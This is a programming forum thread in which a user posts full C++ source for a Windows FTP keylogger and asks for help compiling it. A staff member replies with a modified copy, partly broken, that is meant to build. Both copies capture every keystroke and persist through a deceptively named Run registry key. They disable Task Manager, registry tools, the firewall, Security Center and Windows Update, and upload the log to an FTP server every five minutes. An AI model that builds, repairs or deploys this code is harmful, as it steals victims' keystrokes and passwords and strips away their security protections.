Keylogger help.

Questions about programming languages and debugging
Post Reply
User avatar
shadow1
On the way to fame!
On the way to fame!
Posts: 49
Joined: 11 Jan 2007, 17:00
17
Contact:
Contact shadow1

Keylogger help.

Post by shadow1 »

Hey,

So i found some source code of a nice FTP keylogger, and was wondering why I'm getting these errors on compiling.

Heres the source code

Code: Select all

#include <windows.h> 
#include <Winuser.h> 
#include <string> 
#include <fstream>
using namespace std;

char BatchFile[20] = "system.bat";
char* params;

DWORD WINAPI OpenBatFile(LPVOID)
{
      for(;;) {
 Sleep(300000);
 ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}
}


std::string GetKey(int Key) 
{ 
    std::string KeyString = ""; 

    if (Key == 8) 
        KeyString = "[delete]"; 
    else if (Key == 13) 
        KeyString = "\n"; 
    else if (Key == 32) 
        KeyString = " "; 
    else if (Key == VK_PAUSE) 
        KeyString = "[PAUSE]"; 
    else if (Key == VK_CAPITAL) 
        KeyString = "[CAPITAL]"; 
    else if (Key == VK_SHIFT) 
        KeyString = "[SHIFT]"; 
    else if (Key == VK_TAB) 
        KeyString = "[TABULATOR]"; 
    else if (Key == VK_CONTROL) 
        KeyString = "[CTRL]"; 
    else if (Key == VK_ESCAPE) 
        KeyString = "[ESCAPE]"; 
    else if (Key == VK_END) 
        KeyString = "[END]"; 
    else if (Key == VK_HOME) 
        KeyString = "[HOME]"; 
    else if (Key == VK_LEFT) 
        KeyString = "[LEFT]"; 
    else if (Key == VK_RIGHT) 
        KeyString = "[RIGHT]"; 
    else if (Key == VK_UP) 
        KeyString = "[UP]"; 
    else if (Key == VK_DOWN) 
        KeyString = "[DOWN]"; 
    else if (Key == VK_SNAPSHOT) 
        KeyString = "[SNAPSHOT]"; 
    else if (Key == VK_NUMLOCK) 
        KeyString = "[NUMLOCK]"; 
    else if (Key == 190 || Key == 110) 
        KeyString = "."; 
   
    else if (Key >=96 && Key <= 105) 
        KeyString = Key-48; 
    else if (Key > 47 && Key < 60) 
        KeyString = Key; 
    if (Key != VK_LBUTTON || Key != VK_RBUTTON) 
    { 
        if (Key > 64 && Key < 91) 
        { 
            if (GetKeyState(VK_CAPITAL)) 
                KeyString = Key; 
            else 
            { 
                Key = Key + 32; 
                KeyString = Key; 
            } 
        } 
    } 

    return KeyString; 
} 

int main() 
{
    int WINAPI WinMain (HINSTANCE hThisInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpszArgument,
    int nFunsterStil);
    
  char path[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
    
  char sys[MAX_PATH];
  GetModuleFileName(GetModH, path, sizeof(path));
  GetSystemDirectory(sys, sizeof(sys));
  strcat(sys, "\\borg.exe");
  CopyFile(path, sys, false); 
    
  HKEY hKey, hKey2;
  
  unsigned char reg[2] = "0";
  
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
  RegCloseKey(hKey),(hKey2); 

  DeleteFile("C:\\WINDOWS\\system32\\log.txt");  
    
  ofstream FWUP;
  FWUP.open("C:\\WINDOWS\\system32\\update.bat");
  FWUP<<"@echo off\n";
  FWUP<<"net stop ""Security Center""\n";
  FWUP<<"net stop SharedAccess\n";
  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; 
  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n"; 
  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL %0\n";
  FWUP.close();   
    
  ofstream disable;
  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
  disable<<"@echo off\n";
  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
  disable.close();  
  
  //write ur ftp-information's here
  ofstream log;
  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
  log<<"OPEN myftpserver\n";
  log<<"USER myftpuser\n";
  log<<"myftppassword\n";
  log<<"ASCII\n";
  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
  log<<"BYE\n";
  log<<"exit\n";
  log.close();
  
  ofstream Ausgabe;
  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
  Ausgabe<<"bye\n";
  Ausgabe<<"exit\n";
  Ausgabe.close();
  
  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\syssvr.bat", params, NULL, SW_HIDE);
  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\update.bat", params, NULL, SW_HIDE);
  
  DWORD OpenBatch;
  
  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
    
    std::string Filename = "C:\\WINDOWS\\system32\\log.txt"; 
    std::string TempString = ""; 
    std::fstream FStream; 
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); 

    while(true) 
    { 
        // 0% CPU
        Sleep(5); 

        for(int i = 8; i < 191; i++) 
        { 
           if(GetAsyncKeyState(i)&1 ==1) 
           { 
                TempString = GetKey (i); 

                FStream.write(TempString.c_str(), TempString.size()); 
                FStream.close(); 
                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); 
           } 
        } 
    } 
}
And now, when i compile it with precompile headers off, i get these errors,

Code: Select all

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

	

1>------ Build started: Project: keylog, Configuration: Debug Win32 ------
1>Compiling...
1>keylog.cpp
1>.\keylog.cpp(14) : error C2664: 'ShellExecuteW' : cannot convert parameter 2 from 'const char [5]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(91) : error C2664: 'GetModuleFileNameW' : cannot convert parameter 2 from 'char [260]' to 'LPWCH'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(92) : error C2664: 'GetSystemDirectoryW' : cannot convert parameter 1 from 'char [260]' to 'LPWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(94) : error C2664: 'CopyFile' : cannot convert parameter 1 from 'char [260]' to 'LPCTSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(100) : error C2664: 'RegOpenKeyExW' : cannot convert parameter 2 from 'const char [46]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(101) : error C2664: 'RegSetValueExW' : cannot convert parameter 2 from 'const char [20]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(102) : error C2664: 'RegCreateKeyW' : cannot convert parameter 2 from 'const char [58]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(103) : error C2664: 'RegSetValueExW' : cannot convert parameter 2 from 'const char [15]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(106) : error C2664: 'DeleteFile' : cannot convert parameter 1 from 'const char [28]' to 'LPCTSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(154) : error C2664: 'ShellExecuteW' : cannot convert parameter 3 from 'const char [31]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(155) : error C2664: 'ShellExecuteW' : cannot convert parameter 3 from 'const char [31]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(173) : warning C4554: '&' : check operator precedence for possible error; use parentheses to clarify precedence
1>AssemblyInfo.cpp
1>Generating Code...
1>Build log was saved at "file://c:\Documents and Settings\Dan\My Documents\Visual Studio 2008\Projects\keylog\keylog\Debug\BuildLog.htm"
1>keylog - 11 error(s), 1 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

Help me out please :S
Top
User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:
Contact ayu

Post by ayu »

Well, the reasons could be many since many errors is usually the result of one error (chain reaction). Check the code for line breaks, since it's common when you cut and paste others code.

Best bet is to learn C++ instead, and make your own keylogger ^^
"The best place to hide a tree, is in a forest"
Top
User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:
Contact ayu

Post by ayu »

I didn't have anything else to do, so I debuged to code a little ... it's not 100% since it seems that the issue is not really the code, it's the compiler. But I modified it a bit, and it should work now for your compiler as well.

Just the fact that the coder used for( ; ; ) worries me....

Code: Select all

#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>
#include <tchar.h>
using namespace std;

char BatchFile[20] = "system.bat";
char* params;

DWORD WINAPI OpenBatFile(LPVOID)
{
	while(true) {
		Sleep(300000);
		
		ShellExecute(NULL, L"open", L"system.bat", NULL, NULL, SW_HIDE);

	}
}


std::string GetKey(int Key)
{
    std::string KeyString = "";

    if (Key == 8)
        KeyString = "[delete]";
    else if (Key == 13)
        KeyString = "\n";
    else if (Key == 32)
        KeyString = " ";
    else if (Key == VK_PAUSE)
        KeyString = "[PAUSE]";
    else if (Key == VK_CAPITAL)
        KeyString = "[CAPITAL]";
    else if (Key == VK_SHIFT)
        KeyString = "[SHIFT]";
    else if (Key == VK_TAB)
        KeyString = "[TABULATOR]";
    else if (Key == VK_CONTROL)
        KeyString = "[CTRL]";
    else if (Key == VK_ESCAPE)
        KeyString = "[ESCAPE]";
    else if (Key == VK_END)
        KeyString = "[END]";
    else if (Key == VK_HOME)
        KeyString = "[HOME]";
    else if (Key == VK_LEFT)
        KeyString = "[LEFT]";
    else if (Key == VK_RIGHT)
        KeyString = "[RIGHT]";
    else if (Key == VK_UP)
        KeyString = "[UP]";
    else if (Key == VK_DOWN)
        KeyString = "[DOWN]";
    else if (Key == VK_SNAPSHOT)
        KeyString = "[SNAPSHOT]";
    else if (Key == VK_NUMLOCK)
        KeyString = "[NUMLOCK]";
    else if (Key == 190 || Key == 110)
        KeyString = ".";
   
    else if (Key >=96 && Key <= 105)
        KeyString = Key-48;
    else if (Key > 47 && Key < 60)
        KeyString = Key;
    if (Key != VK_LBUTTON || Key != VK_RBUTTON)
    {
        if (Key > 64 && Key < 91)
        {
            if (GetKeyState(VK_CAPITAL))
                KeyString = Key;
            else
            {
                Key = Key + 32;
                KeyString = Key;
            }
        }
    }

    return KeyString;
}

int main()
{
    int WINAPI WinMain (HINSTANCE hThisInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpszArgument,
    int nFunsterStil);
   
  TCHAR path[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
   
  char sys[MAX_PATH];
  GetModuleFileName(GetModH, path, sizeof(path));
  GetSystemDirectory(_T("sys"), sizeof(sys));
  strcat(sys, "\\borg.exe");
  CopyFile(path, _T("sys"), false);
   
  HKEY hKey, hKey2;
 
  unsigned char reg[2] = "0";
 
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
  RegSetValueEx(hKey, L"MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
  RegCreateKey(HKEY_CURRENT_USER,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
  RegSetValueEx(hKey2,L"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
  RegCloseKey(hKey),(hKey2);

   
  ofstream FWUP;
  FWUP.open("C:\\WINDOWS\\system32\\update.bat");
  FWUP<<"@echo off\n";
  FWUP<<"net stop ""Security Center""\n";
  FWUP<<"net stop SharedAccess\n";
  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL %0\n";
  FWUP.close();   
   
  ofstream disable;
  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
  disable<<"@echo off\n";
  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
  disable.close(); 
 
  //write ur ftp-information's here
  ofstream log;
  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
  log<<"OPEN myftpserver\n";
  log<<"USER myftpuser\n";
  log<<"myftppassword\n";
  log<<"ASCII\n";
  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
  log<<"BYE\n";
  log<<"exit\n";
  log.close();
 
  ofstream Ausgabe;
  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
  Ausgabe<<"bye\n";
  Ausgabe<<"exit\n";
  Ausgabe.close();
 
  ShellExecute(NULL, NULL, L"C:\\WINDOWS\\system32\\syssvr.bat", _T("params"), NULL, SW_HIDE);
  ShellExecute(NULL, NULL, L"C:\\WINDOWS\\system32\\update.bat", _T("params"), NULL, SW_HIDE);
 
  DWORD OpenBatch;
 
  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
   
    std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
    std::string TempString = "";
    std::fstream FStream;
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

    while(true)
    {
        // 0% CPU
        Sleep(5);

        for(int i = 8; i < 191; i++)
        {
           if(GetAsyncKeyState(i) && 1==1)
           {
                TempString = GetKey (i);

                FStream.write(TempString.c_str(), TempString.size());
                FStream.close();
                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
           }
        }
    }
}
"The best place to hide a tree, is in a forest"
Top
User avatar
shadow1
On the way to fame!
On the way to fame!
Posts: 49
Joined: 11 Jan 2007, 17:00
17
Contact:
Contact shadow1

Post by shadow1 »

Wow, thanks for that.

So far, its gone down from 11 errors, to 1.

Here is the compile log:

Code: Select all

1>------ Build started: Project: keylog22, Configuration: Debug Win32 ------
1>Compiling...
1>keylog22.cpp
1>.\keylog22.cpp(1) : warning C4627: '#include <windows.h>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(2) : warning C4627: '#include <Winuser.h>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(3) : warning C4627: '#include <string>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(4) : warning C4627: '#include <fstream>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(5) : warning C4627: '#include <tchar.h>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(187) : fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?
1>Build log was saved at "file://c:\Documents and Settings\Dan\My Documents\Visual Studio 2008\Projects\keylog22\keylog22\Debug\BuildLog.htm"
1>keylog22 - 1 error(s), 5 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========
Top
User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:
Contact ayu

Post by ayu »

That's most likely an error with your compiler, and I don't have any time atm to help you with that. So all I can say is google ^^
"The best place to hide a tree, is in a forest"
Top
Post Reply

Return to “Coding”